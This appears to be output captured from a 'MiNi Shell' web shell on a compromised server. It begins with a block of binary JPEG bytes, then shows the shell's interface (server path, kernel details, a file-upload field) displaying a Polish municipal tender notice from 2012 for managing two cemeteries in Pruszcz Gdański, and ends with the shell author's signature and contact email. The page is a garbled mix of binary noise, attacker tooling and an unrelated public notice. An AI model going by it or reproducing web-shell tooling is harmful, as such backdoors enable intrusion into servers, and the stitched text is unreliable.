JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/60101-N-2012.html

<p class="kh_header"><b>Pruszcz Gdański: Zarządzanie cmentarzami komunalnymi położonymi w Pruszczu Gdańskim, przy ul. Spokojnej i przy ul. Obrońców Pokoju, w okresie do 31.12.2015 r.</b><br>
<b>Numer ogłoszenia: 60101 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Pruszcz Gdański , ul. Grunwaldzka 20, 83-000 Pruszcz Gdański, woj. pomorskie, tel. (058) 775 99 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszcz-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie cmentarzami komunalnymi położonymi w Pruszczu Gdańskim, przy ul. Spokojnej i przy ul. Obrońców Pokoju, w okresie do 31.12.2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest świadczenie usługi polegającej na zarządzaniu cmentarzami komunalnymi położonymi w Pruszczu Gdańskim, przy ul. Spokojnej (tzw. stary cmentarz)                         i przy ul. Obrońców Pokoju (tzw. nowy cmentarz), w okresie do 31.12.2015 r.
Szczegółowy opis przedmiotu zamówienia:
1. Informacje o obiektach: 1.1. cmentarz przy ul. Spokojnej (tzw. stary cmentarz): a) trawniki - 1914 m2, b) żywopłot - 590 mb, c) alejki - 3400 m2, d) punkty czerpania wody - 7 szt., e) powierzchnia ogólna cmentarza -  4,3 ha, f) średnia liczba roczna pochówków  - 60, g) ilość istniejących nagrobków  7100. 1.2. cmentarz przy ul. Obrońców Pokoju (tzw. nowy cmentarz): a) trawnik przed bramą - 500m2, b) utwardzone alejki i plac przed bramą - 2100 m2, c) powierzchnia czasowo wyłączona z grzebania - 15000 m2, d) punkty czerpania wody - 3 szt., e) powierzchnia ogólna cmentarza -  3,2 ha, f) średnia liczba roczna pochówków  - 200, g) ilość istniejących nagrobków 1100, 1.3. Średnie miesięczne koszty zużycia wody i prądu: a) woda: koszt miesięczny średnio około 500 zł, b) prąd: koszt miesięczny średnio około 300 zł. c) roczny koszt opróżniania szamba uzależniony jest od zużycia wody (umywalka i jedna muszla klozetowa) w pomieszczeniach budynku kaplicy cmentarnej. Cena maksymalna za wywóz 1m3 ścieków wynosi 50 zł netto. 1.4. Pozostałe informacje: a) Wykonawca zobowiązany będzie do zawarcia, na czas obowiązywania umowy na wykonanie przedmiotu zamówienia, umów na dostawę wody na oba cmentarze, oraz do zawarcia umów na dostarczanie energii elektrycznej do zasilania cmentarza przy ul. Spokojnej.
b) Bramy wjazdowe cmentarzy powinny być otwierane tylko w uzasadnionych wypadkach (pogrzeb, montaż nagrobka, ekshumacja) w godzinach 7.00 - 20.00. Po opuszczeniu cmentarza przez osoby, którym wjazd został udostępniony, Wykonawca zobowiązany będzie do zamknięcia bram cmentarza. Wykonawca odpowiada za ład i porządek pozostawiony                      przez osoby, którym udostępniony został wjazd na cmentarz. c) Furtki wejściowe cmentarzy muszą być otwarte przez całą dobę. d) Pojazdy, których wjazd na cmentarz spowodowany będzie poleceniem Zamawiającego, będą miały prawo do bezpłatnego wjazdu na teren cmentarza, w terminach i godzinach uzgodnionych z Wykonawcą. e) Wykonawca może otworzyć Biuro Zarządcy Cmentarzami na terenie miasta Pruszcz Gdański lub może korzystać z biura znajdującego się w kaplicy na cmentarzu przy ul Spokojnej. Pozostałe pomieszczenia budynku, w którym znajduje się kaplica Wykonawca może wykorzystywać bezpłatnie jedynie do wykonywania czynności związanych z realizacją przedmiotu zamówienia np. jako biuro w którym załatwiane będą formalności związane z administrowaniem cmentarzami oraz do przechowywania niezbędnych narzędzi służących do wykonywania przedmiotu zamówienia. Wykonawca może nieodpłatnie korzystać z toalety, znajdującej się w budynku. f) Wykonawca może wynająć od Zamawiającego na postawie odrębnej umowy pozostałe (dwa) pomieszczenia w budynku kaplicy o łącznej powierzchni               22 m2. Do ustalenia stawki czynszu zastosowanie będą miały zasady najmu określone w uchwale NR XLVIII_452_2010 Rady Miasta Pruszcz Gdański z dnia 22 września 2010 r. 
g) O ile Wykonawca nie skorzysta z możliwości, o której mowa w pkt 3.4.1.4. lit. f, Zamawiający zastrzega sobie prawo do wynajęcia pozostałych (dwóch) pomieszczeń w budynku kaplicy o łącznej powierzchni 22 m2. Najemca będzie miał prawo do nieodpłatnego wjazdu na teren cmentarza przy ul. Spokojnej oraz będzie miał prawo do odpłatnego korzystania z mediów dostępnych w tych pomieszczeniach. h) Wykonawca na własny koszt umieści na każdym cmentarzu tablicę informacyjną, na której umieści między innymi informacje o nazwie i adresie  firmy zarządzającej cmentarzem, dane kontaktowe, adres i godziny otwarcia  Biura Zarządcy Cmentarzami (styl i wielkość tablicy należy uzgodnić                           z Zamawiającym).
2. Zakres prac obejmuje: 2.1. Zakres prac z tytułu zarządzania cmentarzami: a) Skrupulatne prowadzenie ksiąg cmentarnych poprzez systematyczne dokonywanie wpisów podstawowych i uzupełniających zgodnie z obowiązującymi przepisami. b) Prowadzenie racjonalnej gospodarki miejscami grzebalnymi oraz zarządzanie obiektami zlokalizowanymi na terenie cmentarzy, udzielenie informacji dotyczących lokalizacji grobów i miejsc rezerwowych na podstawie zapisów w księgach cmentarnych. c) Prowadzenie bieżącej ewidencji pochówków i miejsc rezerwowych. d) Prowadzenie komputerowej ewidencji grobów w systemie Grobonet- w tym zamieszczanie zdjęć mogił, zamieszczanie nowych mogił, umieszczanie informacji o należnych płatnościach. e) Wyszukiwanie wolnych miejsc do pochówku na cmentarzu przy ul. Spokojnej. f) Sytuowanie mogił na cmentarzu przy ul. Obrońców Pokoju zgodnie z planem zagospodarowania. g) Nadzorowanie prac firm usługowych (firmy pogrzebowe, zakłady kamieniarskie) w zakresie przestrzegania przez te firmy parametrów przewidzianych w przepisach szczegółowych dotyczących wymiarów grobów, nagrobków, pomników oraz odstępów między nimi. h) Prowadzenie ewidencji pobranych opłat, sporządzanie miesięcznych raportów z wpłat z tytułu opłat za miejsca, opłat eksploatacyjnych, opłat za wjazd i za wynajem kaplicy.
2.2. Zakres prac z tytułu utrzymania cmentarzy: a) Nadzór nad kaplicą: udostępnianie jej do organizacji pogrzebów i utrzymanie jej we właściwym stanie zgodnie z zaleceniami kontroli sanitarno-porządkowej. b) Utrzymanie kaplicy w stanie estetycznym tj. co najmniej raz w roku odświeżenie ścian wewnętrznych, umycie okien, wyposażenie kaplicy w stojaki na wieńce, ławki i inne elementy dekoracyjne niezbędne podczas ceremonii pogrzebowych. c) Wyposażenie terenu cmentarzy w pojemniki na odpady komunalne w ilości co najmniej 30 szt. na każdym cmentarzu, o pojemności co najmniej 240 l  oraz ich bieżącą naprawę i utrzymanie w należytym stanie sanitarnym. Wykonawca zobowiązany będzie do zawarcia umowy  z wykonawcą usług w zakresie odbierania odpadów komunalnych. d) Selektywna zbiórka odpadów z terenów cmentarzy komunalnych w podziale na odpady biodegradowalne i odpady zmieszane. Wykonawca zobowiązany będzie do wyposażenia cmentarzy w osobne pojemniki do selektywnej zbiórki odpadów biodegradowalnych i odpadów zmieszanych. e) 
Pielęgnacja zieleni: koszenie trawników 5 razy w ciągu roku, cięcie żywopłotów 2 razy w roku, cięcie pielęgnacyjne krzewów w uzgodnieniu z Zamawiającym, usuwanie i wywóz połamanych przez wiatr gałęzi, wywóz skoszonej trawy na ogólnodostępne wysypisko na własny koszt. f) Koszenie lub inne zabiegi agrotechniczne na nie eksploatowanej części cmentarza przy ul. Obrońców Pokoju mające za zadanie niedopuszczenie do wzrostu roślin powyżej 20 cm. g) Sporządzanie zasadnych wniosków w sprawie usuwania drzew lub krzewów i przekazywanie ich Zamawiającemu (drzewa usuwa Zamawiający). h) Odchwaszczanie alejek i krzewów (co najmniej 4 razy w roku). i) Oczyszczanie letnie (zamiatanie) i zimowe (odśnieżenie i zapobieganie śliskości) głównych alejek i dróg na cmentarzach. j) Utrzymanie porządku przy grobach zbiorowych. k) Odchwaszczanie opuszczonych mogił (w październiku). l) Zabezpieczenie przenośnych kabin toaletowych w okresie Wszystkich Świętych tj. od 20 października do 10 listopada każdego roku. Wykonawca zawrze umowę z podmiotem świadczącym usługi w zakresie obsługi przenośnych kabin sanitarnych. m) Konserwacja i drobne naprawy ogrodzenia (do 10 mb). W zakres napraw wchodzi uzupełnienie siatki, wymiana uszkodzonych klamek i zawiasów, prostowanie uszkodzonych fragmentów ogrodzenia, napinanie siatki ogrodzeniowej, spawanie urwanych elementów. n) Inne drobne prace porządkowe dotyczące naturalnej eksploatacji cmentarza, np. grabienie liści, zbieranie śmieci, oczyszczanie obrzeży krawężnikowych, oczyszczanie z glonów i zabrudzeń punktów czerpania wody, uzupełnianie fug w punktach czerpania wody, uzupełnianie brakujących elementów obudowy punktów czerpania wody, uzupełnianie lub wymian uszkodzonych kranów w punktach czerpania wody).o) Zapewnienie co najmniej 2 osób na każdym cmentarzu do utrzymania porządku wokół miejsc przeznaczonych do gromadzenia odpadów w okresie Wszystkich Świętych i Dniu Zadusznym. p) Ustawienie i opróżnianie (po zapełnieniu) kontenerów na odpady komunalne o pojemności co najmniej 10 m3, na cmentarzu przy ul Spokojnej - 3 szt.               oraz na cmentarzu przy ul Obrońców Pokoju - 3 szt. Kontenery należy ustawić w okresie od 28 października do 02 listopada każdego roku. q) Utrzymanie w dobrym stanie technicznym ścieżek i alejek, ogrodzenia, punktów czerpania wody. r) Przeglądanie urządzeń cmentarnych pod względem stanu technicznego i w razie potrzeby wykonywanie drobnych napraw wynikłych na skutek normalnego ich używania.
B. Do wykonywania zarządu mają zastosowanie przepisy określone:
1. Ustawą z dnia 31 stycznia 1959 r. o cmentarzach i chowaniu zmarłych (tekst jedn. Dz. U. z 2011 r. Nr 118 poz. 687 z późn. zm.), 2. Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 1 sierpnia 2001 r. w sprawie prowadzenia ewidencji grobów (Dz. U. Nr 90 poz. 1013 z późn. zm.), 3. Ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jedn. Dz. U. z 2010 r. Nr 102 poz. 651 z późn. zm.), 4. Uchwałą Nr XVII_161_2004 r. Rady Miasta Pruszcz Gdański z dnia 28 stycznia 2004 r. w sprawie powierzenia Burmistrzowi Pruszcza Gdańskiego uprawnień w zakresie ustalania wysokości opłat za usługi cmentarne świadczone na cmentarzach komunalnych na terenie Miasta Pruszcz Gdański, 5. Zarządzeniem Nr 139_2004 r. Burmistrza Pruszcza Gdańskiego z dnia 18 marca 2004 r. w sprawie wysokości opłat za usługi cmentarne świadczone na cmentarzach komunalnych na terenie Miasta Pruszcza Gdańskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego. Zamówienia uzupełniające mogą dotyczyć wykonania tego samego rodzaju prac, które zostały wymienione w pkt 3.4. SIWZ, gdy będą one wykonywane w lokalizacji nie ujętej w SIWZ dla zamówienia podstawowego, w związku z powiększeniem terenu cmentarza.
Udzielenie Wykonawcy zamówień uzupełniających nastąpi w trybie art. 67 ust. 1                  pkt 6 ustawy Pzp.
Ustalenie wynagrodzenia Wykonawcy za zamówienia uzupełniające nastąpi w drodze negocjacji pomiędzy Zamawiającym i Wykonawcą.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.00.00-3, 98.37.11.11-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, 1 usługę polegającą na zarządzaniu cmentarzem komunalnym przez okres 12 miesięcy, o ilości mogił 7 000 szt. 
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie według formuły spełnia / nie spełnia na podstawie wyniku badania treści żądanego wykazu usług zawierającego 1 usługę polegającą na zarządzaniu cmentarzem komunalnym przez okres 12 miesięcy, o ilości mogił 7 000 szt. Zamawiający oceni warunek jako spełniony, jeżeli Wykonawca wykaże, że wykonał 1 usługę lub więcej, polegającą/e na zarządzaniu cmentarzem komunalnym przez okres 12 miesięcy lub więcej, o ilości mogił 7 000 szt.                lub więcej, wykonaną/e, a w przypadku świadczeń okresowych lub ciągłych                            również wykonywaną/e, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej/ich wartości, przedmiotu, daty wykonania i odbiorcy oraz załączeniem dokumentu/ów potwierdzającego/ych, że usługa/i ta/e została/y wykonana/e lub jest/są wykonywana/e należycie (załącznik nr 3 do SIWZ).
W przypadku zamieszczenia w ww. wykazie usługi, której wartość została wyrażona                   w walucie innej niż złoty polski, Wykonawca wartość tę przeliczy na złote polskie, według średniego kursu NBP danej waluty z dnia protokolarnego odbioru tej usługi.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował wiedzą                                     i doświadczeniem innych podmiotów (rozumianymi jako wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 1 usługi polegającej na zarządzaniu cmentarzem komunalnym przez okres                12 miesięcy, o ilości mogił 7 000 szt), w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy                i doświadczenia na okres korzystania z nich przy wykonaniu zamówienia.
Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia warunki, których opis sposobu dokonywania oceny spełniania określono w niniejszej sekcji  mogą spełniać łącznie, z tym że żaden z Wykonawców nie może podlegać wykluczeniu z udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawca wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia jako zarządca nieruchomości                       i która będzie wykonywać czynności z zakresu zarządzania nieruchomościami, posiadającą licencję zawodową zarządcy nieruchomościami.
Przez licencję zawodową zarządcy nieruchomościami rozumie się licencję, o której mowa               w ustawie z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. Dz.U. z 2010 r.             Nr 102 poz. 651 z późn. zm.).
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie według formuły spełnia / nie spełnia na podstawie wyniku badania treści żądanego oświadczenia Wykonawcy, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia jako zarządca nieruchomości i która będzie wykonywać czynności z zakresu zarządzania nieruchomościami, posiadającą licencję zawodową zarządcy nieruchomościami (załącznik             nr 4 do SIWZ).
Wykonawca może polegać na następującej osobie, która będzie uczestniczyć                                    w wykonywaniu zamówienia: osobie, która będzie uczestniczyć w wykonywaniu zamówienia jako zarządca nieruchomości i która będzie wykonywać czynności z zakresu zarządzania nieruchomościami, posiadającą licencję zawodową zarządcy nieruchomościami, dostępnej innym podmiotom, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia warunki, których opis sposobu dokonywania oceny spełniania określono w niniejszej sekcji  mogą spełniać wspólnie, z tym że żaden z Wykonawców nie może podlegać wykluczeniu z udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w stosunku do treści oferty w następujących okolicznościach:
Zamawiający przewiduje, w trybie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, możliwość istotnych zmian postanowień Umowy w przypadku wystąpienia następujących okoliczności:
1. w przypadku zmiany zarządcy nieruchomości - osoby, która będzie wykonywać czynności z zakresu zarządzania nieruchomościami, imię i nazwisko oraz numer licencji nowego zarządcy nieruchomości zostaną wprowadzone do treści umowy aneksem.
2. Miesięczne wynagrodzenie należne Wykonawcy będzie dla okresów:                          od 01.03.2013 r. do 01.03.2014 r. i od 01.03.2014 r. do 01.03.2015r. i od 01.03.2015 r.            do 31.12.2015 r. waloryzowane o ogłoszone przez GUS wskaźniki wzrostu cen usług                 i towarów konsumpcyjnych za rok poprzedzający waloryzację, odpowiednio 2012, 2013            i 2014 roku. Waloryzacja miesięcznego wynagrodzenia wprowadzana będzie każdorazowo aneksem do umowy.
Wszelkie zmiany lub uzupełnienia Umowy wymagają zgodnych oświadczeń                obu Stron i formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszcz-gdanski.pl/x.node?id=289<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1. Urząd Miasta, ul. Grunwaldzka 20, 83-000 Pruszcz Gdański (pok. nr 8)
lub2. pocztą (przesyłka zpo)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 10:45, miejsce: Urząd Miasta, ul. Grunwaldzka 20, 83-000 Pruszcz Gdański - pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com